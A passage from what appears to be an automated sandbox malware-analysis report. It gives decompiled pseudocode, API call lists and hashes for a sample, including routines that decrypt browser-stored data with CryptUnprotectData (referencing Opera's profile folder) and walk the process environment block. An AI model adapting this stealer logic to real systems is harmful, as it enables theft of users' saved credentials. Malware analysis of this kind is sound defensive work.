                                                                                															} else {
                                                                                																goto L52;
                                                                                															}
                                                                                															while(1) {
                                                                                																L52:
                                                                                																_t341 =  *_t369;
                                                                                																__eflags =  *_t369;
                                                                                																if( *_t369 == 0) {
                                                                                																	goto L54;
                                                                                																}
                                                                                																E0041BFEF(_t328);
                                                                                																_t369 = _t369 + 1;
                                                                                																__eflags = _t369;
                                                                                																if(_t369 != 0) {
                                                                                																	continue;
                                                                                																}
                                                                                																goto L54;
                                                                                															}
                                                                                															goto L54;
                                                                                														}
                                                                                														_t363 = _t301;
                                                                                														E0041C9D4(_t301);
                                                                                														_t226 =  *(_t301 + 0x14);
                                                                                														goto L100;
                                                                                													}
                                                                                													_t363 = _t301;
                                                                                													E0041C9D4(_t301);
                                                                                													goto L48;
                                                                                												}
                                                                                											}
                                                                                											_t362 =  &_v856 - 1;
                                                                                											__eflags = _t362;
                                                                                											do {
                                                                                												_t297 =  *(_t362 + 1);
                                                                                												_t362 = _t362 + 1;
                                                                                												__eflags = _t297;
                                                                                											} while (_t297 != 0);
                                                                                											asm("movsw");
                                                                                											_t45 =  &_v1160;
                                                                                											 *_t45 = _v1160 + 1;
                                                                                											__eflags =  *_t45;
                                                                                											goto L39;
                                                                                										}
                                                                                										_t341 = _v1192;
                                                                                										_t226 = E0041C7D2(_t301, _a8, _v1192);
                                                                                										goto L30;
                                                                                									}
                                                                                									_t226 = E0041C6AF(_t301, _v1192, _a8);
                                                                                									goto L30;
                                                                                								}
                                                                                								_t363 = _t301;
                                                                                								_t226 = E0041C62D(_t301, _v1192);
                                                                                								goto L30;
                                                                                							}
                                                                                							_t356 =  &_v320;
                                                                                							_t298 = E0041C05F( &_v320);
                                                                                							__eflags = _t298;
                                                                                							if(_t298 == 0) {
                                                                                								goto L22;
                                                                                							}
                                                                                							goto L21;
                                                                                						}
                                                                                						_t299 =  &_v320;
                                                                                						_t341 = _t299 + 1;
                                                                                						do {
                                                                                							_t340 =  *_t299;
                                                                                							_t299 = _t299 + 1;
                                                                                							__eflags = _t340;
                                                                                						} while (_t340 != 0);
                                                                                						_t300 = _t299 - _t341;
                                                                                						__eflags =  *((char*)(_t379 + _t300 - 0x13d)) - 0x2f;
                                                                                						_v1186 = 1;
                                                                                						if( *((char*)(_t379 + _t300 - 0x13d)) != 0x2f) {
                                                                                							goto L19;
                                                                                						}
                                                                                						goto L18;
                                                                                					} else {
                                                                                						_t226 = 0x50000;
                                                                                						goto L100;
                                                                                					}
                                                                                				} else {
                                                                                					_t226 = 0x40000;
                                                                                					L100:
                                                                                					return E0041DEB4(_t226, _t301, _v12 ^ _t379, _t341, _t356, _t363);
                                                                                				}
                                                                                			}
                                                                                0x0041cd86
                                                                                0x0041cd82
                                                                                0x0041cd94
                                                                                0x0041cd9b
                                                                                0x0041cda1
                                                                                0x0041cda8
                                                                                0x0041cdaa
                                                                                0x0041cdc1
                                                                                0x0041cdc1
                                                                                0x00000000
                                                                                0x0041cdac
                                                                                0x0041cdac
                                                                                0x0041cdaf
                                                                                0x0041cdb1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cdb9
                                                                                0x0041cdc7
                                                                                0x0041cdca
                                                                                0x0041cdd2
                                                                                0x0041cdd5
                                                                                0x0041cddf
                                                                                0x0041cdeb
                                                                                0x0041cdf1
                                                                                0x0041cdfa
                                                                                0x0041ce03
                                                                                0x0041ce0c
                                                                                0x0041ce0f
                                                                                0x0041ce1a
                                                                                0x0041ce28
                                                                                0x0041ce2d
                                                                                0x0041ce34
                                                                                0x0041ce40
                                                                                0x0041ce43
                                                                                0x0041ce4e
                                                                                0x0041ce5c
                                                                                0x0041ce61
                                                                                0x0041ce68
                                                                                0x0041ce71
                                                                                0x0041ce74
                                                                                0x0041ce82
                                                                                0x0041ce8a
                                                                                0x0041ce90
                                                                                0x0041ce99
                                                                                0x0041cea0
                                                                                0x0041cea4
                                                                                0x0041cead
                                                                                0x0041ceae
                                                                                0x0041ceaf
                                                                                0x0041ceb0
                                                                                0x0041ceb8
                                                                                0x0041cec2
                                                                                0x0041cec8
                                                                                0x0041cecc
                                                                                0x0041ced1
                                                                                0x0041ced3
                                                                                0x0041cef6
                                                                                0x0041cef9
                                                                                0x0041cefd
                                                                                0x0041cf0e
                                                                                0x0041cf10
                                                                                0x0041cf13
                                                                                0x0041cf19
                                                                                0x0041cf20
                                                                                0x0041cf27
                                                                                0x0041cf29
                                                                                0x0041cf39
                                                                                0x0041cf39
                                                                                0x0041cf40
                                                                                0x0041cf42
                                                                                0x0041cf50
                                                                                0x0041cf53
                                                                                0x0041cf58
                                                                                0x0041cf59
                                                                                0x0041cf59
                                                                                0x0041cf5b
                                                                                0x0041cf63
                                                                                0x0041cf67
                                                                                0x0041cf68
                                                                                0x0041cf68
                                                                                0x0041cf76
                                                                                0x0041cf79
                                                                                0x0041cf79
                                                                                0x0041cf7b
                                                                                0x0041cf7b
                                                                                0x0041cf86
                                                                                0x0041cf8b
                                                                                0x0041cf8c
                                                                                0x0041cf8d
                                                                                0x0041cf8f
                                                                                0x0041cf8f
                                                                                0x0041cf96
                                                                                0x0041cf98
                                                                                0x0041cf9a
                                                                                0x0041cfa1
                                                                                0x0041cfa9
                                                                                0x0041cfab
                                                                                0x0041cfb0
                                                                                0x0041cfb0
                                                                                0x0041cfb0
                                                                                0x0041cfb0
                                                                                0x0041cfa1
                                                                                0x0041cfb4
                                                                                0x0041cfba
                                                                                0x0041cfbc
                                                                                0x0041cfcc
                                                                                0x0041cfcc
                                                                                0x0041cfcc
                                                                                0x00000000
                                                                                0x0041cfbe
                                                                                0x0041cfbe
                                                                                0x0041cfc5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cfc9
                                                                                0x0041cfce
                                                                                0x0041cfce
                                                                                0x0041cfd5
                                                                                0x0041cfdb
                                                                                0x0041cfde
                                                                                0x0041d008
                                                                                0x0041d00e
                                                                                0x0041d00e
                                                                                0x0041d010
                                                                                0x0041d014
                                                                                0x0041d019
                                                                                0x0041d01f
                                                                                0x0041d022
                                                                                0x0041d025
                                                                                0x0041d027
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d02d
                                                                                0x0041d033
                                                                                0x0041cedc
                                                                                0x0041cedc
                                                                                0x00000000
                                                                                0x0041cedc
                                                                                0x0041d03f
                                                                                0x0041d042
                                                                                0x0041d044
                                                                                0x0041d04a
                                                                                0x0041d053
                                                                                0x0041d056
                                                                                0x0041d05a
                                                                                0x0041d060
                                                                                0x0041d066
                                                                                0x0041d0e3
                                                                                0x0041d0e3
                                                                                0x0041d0ea
                                                                                0x0041d0f6
                                                                                0x0041d0f8
                                                                                0x0041d0fe
                                                                                0x0041d0fe
                                                                                0x0041d100
                                                                                0x0041d106
                                                                                0x0041d10b
                                                                                0x0041d10d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d11a
                                                                                0x0041d11a
                                                                                0x0041d11a
                                                                                0x0041d11e
                                                                                0x0041d125
                                                                                0x0041d125
                                                                                0x0041d128
                                                                                0x0041d12a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d13e
                                                                                0x0041d147
                                                                                0x0041d154
                                                                                0x0041d15a
                                                                                0x0041d165
                                                                                0x0041d16d
                                                                                0x0041d16d
                                                                                0x0041d16f
                                                                                0x0041d172
                                                                                0x0041d174
                                                                                0x0041d17d
                                                                                0x0041d17d
                                                                                0x0041d17d
                                                                                0x0041d183
                                                                                0x0041d186
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d17b
                                                                                0x0041d17b
                                                                                0x0041d188
                                                                                0x0041d18e
                                                                                0x0041d18e
                                                                                0x00000000
                                                                                0x0041d18e
                                                                                0x0041d176
                                                                                0x00000000
                                                                                0x0041d176
                                                                                0x0041d0fa
                                                                                0x0041d0fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d0fc
                                                                                0x0041d0ec
                                                                                0x0041d0ec
                                                                                0x00000000
                                                                                0x0041d0ec
                                                                                0x0041d068
                                                                                0x0041d06b
                                                                                0x0041d076
                                                                                0x0041d076
                                                                                0x0041d07d
                                                                                0x0041d084
                                                                                0x0041d08b
                                                                                0x0041d08b
                                                                                0x0041d08b
                                                                                0x0041d08b
                                                                                0x0041d09f
                                                                                0x0041d0a2
                                                                                0x0041d0ab
                                                                                0x0041d0b0
                                                                                0x0041d0b2
                                                                                0x0041d0be
                                                                                0x0041d0c0
                                                                                0x0041d0c6
                                                                                0x0041d0cb
                                                                                0x0041d0cd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d0d3
                                                                                0x0041d0d8
                                                                                0x0041d0dd
                                                                                0x0041d0df
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d0b4
                                                                                0x0041d0b4
                                                                                0x0041d0b4
                                                                                0x00000000
                                                                                0x0041d0b4
                                                                                0x0041d0b2
                                                                                0x0041d06d
                                                                                0x0041d074
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041d074
                                                                                0x0041cfe0
                                                                                0x0041cfe3
                                                                                0x0041cff5
                                                                                0x0041cff7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cffb
                                                                                0x0041d000
                                                                                0x0041d000
                                                                                0x00000000
                                                                                0x0041d000
                                                                                0x0041cfee
                                                                                0x00000000
                                                                                0x0041cfee
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cf2b
                                                                                0x0041cf2b
                                                                                0x0041cf2b
                                                                                0x0041cf2d
                                                                                0x0041cf2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cf31
                                                                                0x0041cf36
                                                                                0x0041cf36
                                                                                0x0041cf37
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041cf37
                                                                                0x00000000
                                                                                0x0041cf2b
                                                                                0x0041ceff
                                                                                0x0041cf01
                                                                                0x0041cf06
                                                                                0x00000000
                                                                                0x0041cf06
                                                                                0x0041ced5
                                                                                0x0041ced7
                                                                                0x00000000
                                                                                0x0041ced7
                                                                                0x0041cdaa
                                                                                0x0041cd02
                                                                                0x0041cd02
                                                                                0x0041cd03
                                                                                0x0041cd03
                                                                                0x0041cd06
                                                                                0x0041cd07
                                                                                0x0041cd07
                                                                                0x0041cd10
                                                                                0x0041cd12
                                                                                0x0041cd12
                                                                                0x0041cd12
                                                                                0x00000000
                                                                                0x0041cd12
                                                                                0x0041cc9a
                                                                                0x0041cca0
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: /$UT
                                                                                • API String ID: 0-1626504983
                                                                                • Opcode ID: 76391278201aac92ab84a614280e8b1953d29d50434a293e69dbf5287f7c68dc
                                                                                • Instruction ID: fd8b7bcc005b4055f3cd7298a9f5b56cb4a32a40161bfb45bc6a276b5936a230
                                                                                • Opcode Fuzzy Hash: 76391278201aac92ab84a614280e8b1953d29d50434a293e69dbf5287f7c68dc
                                                                                • Instruction Fuzzy Hash: 630261B1D442688BDF25CF288C803DA7BB1AF55304F1444EAD949AB346D6389EC5CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0042D026(void* __edi, char* __esi) {
                                                                                				short _v8;
                                                                                				void* _t24;
                                                                                
                                                                                				_t24 = __edi;
                                                                                				if(__esi == 0 ||  *__esi == 0 || E00426D80(__esi, ?str?) == 0) {
                                                                                					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
                                                                                						if(_v8 != 0) {
                                                                                							goto L5;
                                                                                						} else {
                                                                                							return GetACP();
                                                                                						}
                                                                                					} else {
                                                                                						goto L8;
                                                                                					}
                                                                                				} else {
                                                                                					if(E00426D80(__esi, ?str?) != 0) {
                                                                                						_v8 = E0041F2DD(__esi);
                                                                                						goto L5;
                                                                                					} else {
                                                                                						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
                                                                                							L8:
                                                                                							return 0;
                                                                                						} else {
                                                                                							L5:
                                                                                							return _v8;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}






                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0042D663,?,00422072,?,000000BC,?,00000001,00000000,00000000), ref: 0042D065
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0042D663,?,00422072,?,000000BC,?,00000001,00000000,00000000), ref: 0042D08E
                                                                                • GetACP.KERNEL32(?,?,0042D663,?,00422072,?,000000BC,?,00000001,00000000), ref: 0042D0A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                • Opcode ID: 2285dc8713adbe3c9d406ae614dc47d018e5268425dee8397a194ab756531158
                                                                                • Instruction ID: 7f6fb99b993c7ba38f18b7e83791968bfbbbb52a9b2ffcd3d875bc124439c8cf
                                                                                • Opcode Fuzzy Hash: 2285dc8713adbe3c9d406ae614dc47d018e5268425dee8397a194ab756531158
                                                                                • Instruction Fuzzy Hash: 6301D430B0026ABAEB219B71BC05F9F77A8AF0571CFA0016AF141E11E0DB78DA43865D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0041DEB4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                				intOrPtr _v0;
                                                                                				void* _v804;
                                                                                				intOrPtr _v808;
                                                                                				intOrPtr _v812;
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t11;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t13;
                                                                                				long _t17;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr* _t31;
                                                                                				void* _t34;
                                                                                
                                                                                				_t27 = __esi;
                                                                                				_t26 = __edi;
                                                                                				_t25 = __edx;
                                                                                				_t22 = __ecx;
                                                                                				_t21 = __ebx;
                                                                                				_t6 = __eax;
                                                                                				_t34 = _t22 -  *0x447674; // 0x4124c941
                                                                                				if(_t34 == 0) {
                                                                                					asm("repe ret");
                                                                                				}
                                                                                				 *0x448f08 = _t6;
                                                                                				 *0x448f04 = _t22;
                                                                                				 *0x448f00 = _t25;
                                                                                				 *0x448efc = _t21;
                                                                                				 *0x448ef8 = _t27;
                                                                                				 *0x448ef4 = _t26;
                                                                                				 *0x448f20 = ss;
                                                                                				 *0x448f14 = cs;
                                                                                				 *0x448ef0 = ds;
                                                                                				 *0x448eec = es;
                                                                                				 *0x448ee8 = fs;
                                                                                				 *0x448ee4 = gs;
                                                                                				asm("pushfd");
                                                                                				_pop( *0x448f18);
                                                                                				 *0x448f0c =  *_t31;
                                                                                				 *0x448f10 = _v0;
                                                                                				 *0x448f1c =  &_a4;
                                                                                				 *0x448e58 = 0x10001;
                                                                                				_t11 =  *0x448f10; // 0x0
                                                                                				 *0x448e0c = _t11;
                                                                                				 *0x448e00 = 0xc0000409;
                                                                                				 *0x448e04 = 1;
                                                                                				_t12 =  *0x447674; // 0x4124c941
                                                                                				_v812 = _t12;
                                                                                				_t13 =  *0x447678; // 0xbedb36be
                                                                                				_v808 = _t13;
                                                                                				 *0x448e50 = IsDebuggerPresent();
                                                                                				_push(1);
                                                                                				E0042F2C5(_t14);
                                                                                				SetUnhandledExceptionFilter(0);
                                                                                				_t17 = UnhandledExceptionFilter(0x438e50);
                                                                                				if( *0x448e50 == 0) {
                                                                                					_push(1);
                                                                                					E0042F2C5(_t17);
                                                                                				}
                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                			}




















                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00424097
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004240AC
                                                                                • UnhandledExceptionFilter.KERNEL32(00438E50), ref: 004240B7
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 004240D3
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004240DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID:
                                                                                • API String ID: 2579439406-0
                                                                                • Opcode ID: d1227ddd02e44f727ab6bfe88f683d217f684dd8178b6e176109bea82ce3b7e9
                                                                                • Instruction ID: 42523199e0496858c6f3ef741f8fe1b6c3c72ff08fbcea3be4b5edc50b7c5d92
                                                                                • Opcode Fuzzy Hash: d1227ddd02e44f727ab6bfe88f683d217f684dd8178b6e176109bea82ce3b7e9
                                                                                • Instruction Fuzzy Hash: 6B21FEBC9003149FD700EF25E9456487BB6BB0A319B60443EEA08C3261EBB4598A8F4D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00C73901
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C73916
                                                                                • UnhandledExceptionFilter.KERNEL32(00C613B4), ref: 00C73921
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00C7393D
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C73944
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID:
                                                                                • API String ID: 2579439406-0
                                                                                • Opcode ID: d11a92ebd5861b26969c0916701d3e81d7b92d08fd63875dbda5e8771e60ed6c
                                                                                • Instruction ID: 78147c9c6b27f15ac8ed897e950b54c265c1373311fdd8c61f7e470ece5d4147
                                                                                • Opcode Fuzzy Hash: d11a92ebd5861b26969c0916701d3e81d7b92d08fd63875dbda5e8771e60ed6c
                                                                                • Instruction Fuzzy Hash: 5F21EFB4800344DFC711DF69FC857883BA2BB4B319F14401AE90AC7B60E7B4A985CF66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E0040F8E3(char __eax, intOrPtr __ecx, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				char _t23;
                                                                                				void* _t24;
                                                                                
                                                                                				_t23 = __eax;
                                                                                				_t21 = __ecx;
                                                                                				E00421230(E0041E042(_t20, __ecx, __eax, __eax), _t21, _t23);
                                                                                				_v8 = _t21;
                                                                                				_v12 = _t23;
                                                                                				_t24 = E0041E042(_t20, _t21, _t23, _t23);
                                                                                				_push( &_v20);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push( &_v12);
                                                                                				if( *0x44a130() == 0) {
                                                                                					return 0;
                                                                                				}
                                                                                				_t22 = _v20;
                                                                                				if(_t22 > 0) {
                                                                                					E00421230(_t24, _v16, _t22);
                                                                                				}
                                                                                				 *((char*)(_t22 + _t24)) = 0;
                                                                                				return _t24;
                                                                                			}















                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0040F8F1
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • _memmove.LIBCMT ref: 0040F8F9
                                                                                • _malloc.LIBCMT ref: 0040F905
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F91E
                                                                                • _memmove.LIBCMT ref: 0040F934
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
                                                                                • String ID:
                                                                                • API String ID: 2315474888-0
                                                                                • Opcode ID: d312a12141f7c08cd22da458a9e876fde632b35940e82e4f562c6c69d5fb98c2
                                                                                • Instruction ID: 8e12b4296f2748bae1805476724645e43c523f7cbe75c9f35b2020013eb0425e
                                                                                • Opcode Fuzzy Hash: d312a12141f7c08cd22da458a9e876fde632b35940e82e4f562c6c69d5fb98c2
                                                                                • Instruction Fuzzy Hash: FEF0C2B7E00124BBC720AAFA9C45CEFBAAC9DA1754B44047BF400F3242E578D90483B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0040F6A5(intOrPtr __eax, long* __edi, char _a4, void** _a8) {
                                                                                				void* _v8;
                                                                                				long _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				long _t19;
                                                                                				void* _t20;
                                                                                				void* _t22;
                                                                                
                                                                                				_v16 = __eax;
                                                                                				_v20 = _a4;
                                                                                				_t22 =  *0x44a130( &_v20, 0, 0, 0, 0, 0,  &_v12);
                                                                                				if(_t22 != 0) {
                                                                                					_t19 = _v12;
                                                                                					 *__edi = _t19;
                                                                                					_t20 = LocalAlloc(0x40, _t19);
                                                                                					 *_a8 = _t20;
                                                                                					if(_t20 != 0) {
                                                                                						E00421230(_t20, _v8,  *__edi);
                                                                                					}
                                                                                				}
                                                                                				return LocalFree(_v8) & 0xffffff00 | _t22 != 0x00000000;
                                                                                			}











                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040F6C5
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F6D9
                                                                                • _memmove.LIBCMT ref: 0040F6EE
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00414013,?,\Opera Stable\), ref: 0040F6F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                                                                • String ID:
                                                                                • API String ID: 3008826695-0
                                                                                • Opcode ID: 0e797b80411f5249b4e92994604441a1934d7bb5cf0faeb169f5518669d1a3ca
                                                                                • Instruction ID: bf2e848067eb5d4dca7efae01f5592b5b6e9b7df25eaf559de0164cda3802c89
                                                                                • Opcode Fuzzy Hash: 0e797b80411f5249b4e92994604441a1934d7bb5cf0faeb169f5518669d1a3ca
                                                                                • Instruction Fuzzy Hash: 5BF04FB5D00228AFCB01AFE4DC8989EBBBDEF08700F104875F901E7251E7769A549F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040F64C(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
                                                                                				int _v8;
                                                                                				BYTE* _t8;
                                                                                				int _t9;
                                                                                
                                                                                				 *__ebx = 0;
                                                                                				_v8 = 0;
                                                                                				 *__edi = 0;
                                                                                				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
                                                                                					_t8 = LocalAlloc(0x40,  *__edi);
                                                                                					 *__ebx = _t8;
                                                                                					if(_t8 != 0) {
                                                                                						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
                                                                                						_v8 = _t9;
                                                                                						if(_t9 == 0) {
                                                                                							 *__ebx = LocalFree( *__ebx);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _v8;
                                                                                			}







                                                                                APIs
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040F664
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,0040F87A,?,?,00441408,00000000,-0000001D), ref: 0040F672
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040F688
                                                                                • LocalFree.KERNEL32(?,?,?,0040F87A,?,?,00441408,00000000,-0000001D), ref: 0040F697
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 4291131564-0
                                                                                • Opcode ID: d3cde1f4731fd7c0f3ae1c3c28740f5cb1e59c49fb130f287165d4335a15ea45
                                                                                • Instruction ID: 3e65eb0fd80b9b5ae2cb91d2f39911a7dc48803ade655c59b0832b9c5bc50277
                                                                                • Opcode Fuzzy Hash: d3cde1f4731fd7c0f3ae1c3c28740f5cb1e59c49fb130f287165d4335a15ea45
                                                                                • Instruction Fuzzy Hash: 5EF03C70101234BBCB325F22CC4CE8B7FBCEF06BA0B000065F509E6264D7714950DAA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401000(void* __eax, void* __ecx, WCHAR* _a4) {
                                                                                				signed int _v8;
                                                                                				void* _t13;
                                                                                				intOrPtr* _t16;
                                                                                				intOrPtr* _t20;
                                                                                
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				0;
                                                                                				_v8 =  *[fs:0x30];
                                                                                				_t20 =  *((intOrPtr*)(_v8 + 0xc)) + 0x14;
                                                                                				_t16 =  *_t20;
                                                                                				while(_t16 != _t20) {
